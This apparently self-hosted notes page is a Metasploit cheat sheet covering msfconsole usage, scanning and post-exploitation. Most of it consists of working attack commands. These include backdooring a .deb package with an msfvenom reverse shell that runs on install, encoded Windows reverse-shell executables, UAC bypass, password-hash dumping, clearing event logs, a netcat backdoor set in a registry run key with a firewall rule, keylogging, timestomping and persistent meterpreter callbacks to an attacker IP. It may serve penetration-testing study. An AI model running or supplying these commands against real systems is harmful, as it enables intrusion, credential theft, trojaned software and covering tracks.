D   A   T   A   W   O   K

• home
• projects
• keyring
• NOTES
• feed
• propaganda

Metasploit Framework

Files location

Data is in /usr/share/metasploit-framework

modules:
    exploits: for known vulnerabilities
    payloads: the code that is delivered to the compromised system
    post: post exploitation operations
    nops: data to pad the payload (depends on interpreter/architecture)
    encoders: generate payload in a way trying to decept the antivirus
    evasion:
    auxiliary:
    plugins: extensions to the `msf`
lib: ruby libraries supporting the framework

Start the framework

Start postgresql service to save information related to msf

$ service postgresql start

Initialize the database

$ msfdb init

Start metasploit framework.

$ msfconsole

MSF console

Get the list of available commands:

> help

Comands are divided in sections. E.g. get database status:

> db_status

Core commands

Search for an exploit or payload. E.g. search for reverse tcp:

> search reverse_tcp

Load a plugin:

> load

Interact with a module by name:

> use windows/shell/reverse_tcp

One particular module (e.g. an exploit) can have "options":

> show options

To set a particular option. E.g. set the LHOST variable:

> set LHOST 127.0.0.1

To unset a particular option:

> set LHOST

Back to the global dispatcher context. For example to undo the use directive (looks like the altered options remain setted).

> back

Set global option (setg alias of set -g). This implicitly also set the module specific options with the same name.

> setg LHOST 127.0.0.1

To unset a global setting

> unsetg LHOST

Once selected a particular module we can see the payloads usable with that module. E.g.

> use windows/fileformat/ms09_067_excel_featheader

Payloads and Stagers

A payload is a single module and is something that works alone.

A stager is a module that is trying to stage a connection between msf and the victim machine. Makes the connection.

Stages are the pieces of the payload that are downloaded by the stager.

Select a payload:

> use payload/windows/shell_bind_tcp

Generate a shellcode using the generate command.

Get help:

> help generate

We can filter out some bytes from the payload using the -b option. For example to get rid of the characters 0x7c and 0x0a:

> generate -b '\x7c\x0a'

We can use several encoders

> show encoders

By default msf selects the best encoder for the job. If we decide to avoid some characters other encoders may be used.

To explicitly select the encoder:

> generate -e x86/add_sub

To save to a file:

> generate -f <filename>

Number of encoding iterations (mostly for anti virus evasion). The output payload will be bigger as well.

> generate -i 3

The payload is generated using the parameters that can be viewed with the options command. We can set the options to be used on the fly by using the -o option.

> generate -o LPORT=1234,EXITFUNC=seh

Exit function

The payload EXITFUNC option is used to set the way the payload shall exit. In short specifies the function to call when the payload is complete

• process: the exploit runs in a master process;
• thread: the exploit runs in a thread;
• seh: structured exception handler;
• none: nothing.

Without options, generates the payload in "Ruby". We can let msf generate the payload for different languages. E.g. in C language:

> generate -f c

Database commands

List or switch workspaces:

> workspace

Add a new workspace:

> workspace -a <name>

Import a scan result file (e.g. Nessus):

> db_import

Export:

> db_export

Tables

List all services in the database. E.g. running on port 21 and show only port and proto columns:

> services -p 21 -c port,proto

List all hosts in the database

> hosts

Meterpreter

Console started when the exploit is in progress.

Once that an exploit has been selected via the use command, we can start an exploitation attempt (exploit or run):

> exploit

Put a session in background and return to it later:

> background

To show all the active sessions:

> sessions

We can start a command shell (we can terminate it using exit):

> shell

There is a bounch of commands available. E.g. to download a file to the local machine:

> download <filename>

To execute a "Post" module:

> run <postmodule>

For example:

> run post/linux/gather/hashdump

The database is automatically updated with the vulerabilities, etc.

To cleanup all the informations bound to a given host

> hosts -d <ip>

To exit from the metasploit interpreter:

> exit

Information Gathering

Vulnerability scanning -> Nessus Port scanning -> nmap

Banner grabbing: deduce the service application/version using the info sent spontaneously by the app during the connection.

NMap

NMap can be run directly from metasploit. E.g. to get OS information, services details, traceroute and other useful stuff:

> nmap -A <ip>

It doesn't automatically update the database. To update the database with the results:

> db_nmap -A <ip>

Now we can take a look at the infos in the db: hosts, services, vulns, etc.

The other portscanners:

> search portscan

Use one of the "built-in" scanners. E.g. the TCP portscan

> use auxiliary/scanner/portscan/tcp

And then start the scan using the run command.

There are other type of service specific scanners

> search scanner

To use the samba version scanner

> use auxiliary/scanner/smb/smb_version
> run

Vulnerability Scanning

WMAP

Web application vulnerability scanner. Load WMAP module.

> load wmap

Now the help command reports the wmap commands as well.

To add a site

> wmap_sites -a http://<host>

To add a target (root folder)

> wmap_targets -t http://<host>/

List the modules that will be used to scan the remote system.

> wmap_run -t

Run the WMAP scan against our target URL.

> wmap_run -e

See if WMAP found anything of interest.

> wmap_vulns -l

Nessus

Load Nessus module.

> load nessus

Connect to the nessus server

> nessus_connect username:password@hostname:port <ssl_verify/ssl_ignore>

From the web application we run a scan. We can export the found results in "binary" nessus format.

We can import then the scan from metasploit

> db_import <file>

Client Side Attacks

Linux Reverse Shell

As an example, the xbomb package is modified "by hand" to contain a malicious executable file.

$ dbpg -x package.deb

Beside the files that are supposed to go to the target filesystem there are some "control" files that are used by dpkg to control the installation process"

DEBIAN/control  : package information
DEBIAN/postinst : post installation actions

MSFVenom: metasploit standalone payload generator.

The payload opens a remote shell to the attacker machine (LHOST) on the specified port (LPORT).

$ msfvenom -a x64 --platform linux \
    -p linux/x64/shell/reverse_tcp LHOST=192.168.0.3 LPORT=443 \
    -b "\x00" -f elf -o /root/backdoor/workdir/usr/games/xbomb_scores

The payload becomes part of the package. When the victim installs it... The package shalle be rebuilt

$ dpkg-deb --build /root/backdoor/workdir/

Now I need to put something listening on port 443 on the attacker machines.

$ msfconsole -q -x "use exploit/multi/handler; \
    set PAYLOAD linux/x64/shell/reverse_tcp; \
    set LHOST 192.168.0.3; set LPORT 443; run; \
    exit -y"

-q : quiet (do not print banner at startup)
-x : execute the specified string as console commands
     exit -y to exit without prompting for confirmation

The PAYLOAD shall match the one used to create the payload via msfvenom

Note that the same can be done interactivelly by launching the msfconsole and typing the above commands.

When the victim installs the malicious package it will connect to the attacker machine that will get a root shell under the msfconsole process.

Windows Reverse Shell

Use MSFVenom to create the payload for the victim machine

$ msfvenom -p windows/meterpreter/reverse_tcp \
    -b "\x00" LHOST=192.168.0.3 LPORT=4444 \
    -i 5 -f exe -o win-rev-shell.exe

-i : iterations for the encoder

Use MSFConsole to create the handler

$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.3; set LPORT 4444; run; exit -y"

Once the victim fires the win-rev-shell.exe our interpreter is bound to that program process. If the user closes the process our connection dies. We can avoid this by migrating our connection to another process:

meterpreter> run post/windows/manage/migrate

Post Exploitation

Meterpreter basics

Simplified interface to run commands on the target machine once already compromised.

meterpreter> getuid
meterpreter> ps

To put the meterpreter in background

meterpreter> background

I can then search for other exploits to be executed locally

meterpreter> search exploit/windows/local

To list the active meterpreter sessions:

msf > sessions

To connect to a particular session

msf > sessions -i #session-id

To get a screenshot of the desktop

meterpreter> screenshot

Privilege escalation

To bypass the "User Account Control" from metasploit.

msf> search bypassuac
...
msf> use exploit/windows/local/bypassuac

In the options I have to use the meterpreter session where I want to run the exploit

msf> set session #session-id

(Due to a probable bug the first run goes in timeout)

After timeout I get some more options to set....

msf> set LHOST <attacker-ip>
msf> set LPORT <attacker-port>
msf> run

I get another meterpreter session with admin privileges.

Get password hashes.

meterpreter> hashdump

Clearing Windows event logs

Once we have a system administrator account.

meterpreter> clearev

This leaves in the "Computer Management->Event Viewer->Windows Logs" the event: "LOG Clear" which is a bit suspicious anyway.

Using Incognito

Tool to assume different identities under the compromised system without using password hashes for a dictionary attack or rainbow tables. Used to be a standalone project. Now is integrated in metasploit framework.

meterpreter> use incognito
meterpreter> list_tokens -[u|g] (users or groups)

• "Imprersonate" token let you deal with things that are not interactive.

• "Delegate" token let you run interactive commands (e.g. a shell).

  meterpreter> impersonate_token IE8Win7\IEUser meterpreter> shell (to spawn a command shell)

NetCat

Persistent backdoor. Setup a listener on a port of choice.

Upload netcat to the compromised system

meterpreter> upload /usr/share/windows_binaries/nc.exe C:\\windows\\system32

Edit the register key to let the system run netcat at every boot

meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Add rule to windows firewall (first we shall enter a command shell)

meterpreter> shell
C:\> netsh advfirewall firewall add rule name='netcat' protocol=tcp localport=445 dir=in action=allow protgram='c:\windows\system32\nc.exe'

Once reboot there shall be netcat listening on the specified port. From the Kali machine, to get the windows remote command prompt:

$ nc -v <ip> <port>

GetGui

Once the system is compromised I may like to access it via RDP. Add a new user with a new password.

meterpreter> run getgui -u victim -p password

On a kali shell start an rdp session to the victim machine.

$ rdesktop -v victim -p password <victimip>

After logout remember to run the cleanup script (as suggested by getgui).

Sniffing traffic

We can run a sniffer and redirect information to the meterpreter shell.

meterpreter> use sniffer
meterpreter> sniffer_interfaces (show available interfaces)
meterpreter> sniffer_start <n>  (n is the interface I want to sniff)
meterpreter> sniffer_dump <n> /root/Desktop/snif.cap (download capture to kali)
meterpreter> sniffer_stop <n>

On kali i can then read the pcap using wireshark.

Port forwarding

Use the victim machine as a gateway to connect to other systems not accessible directly.

meterpreter> portfwd add -l <locport> 445 -p <remport> -r <remip>
meterpreter> portwd list  (to list active forward rules)

Similar to ssh tunnelling.

Change file attributes

To modify timestamp attributes. To set the attributes equal to the supplied file (e.g. desktop.ini)

meterpreter> timestamp tools.exe -f desktop.ini

Search function

To search for files within the compromised system.

meterpreter> search

Maintaining access

Keylogging

meterpreter> keyscan_start
meterpreter> keyscan_dump
meterpreter> keyscan_stop

Metasploit as a service

Install meterpreter persistent backdoor.

meterpreter> run persistence -U -i 5s -p <port> -r <ip>

-U automatically when user logs on
-i <opt> interval in seconds between each connection attempt
-p <opt> remote port (attacker port)
-r <opt> remote address (attacker address)

Now I reboot the windows machine to start the service. From Kali, run the handler

msf> use exploit/multi/handler
msf> run

After ~5s the windows machine should connect to us.

Proudly self-hosted on a cheap Raspberry Pi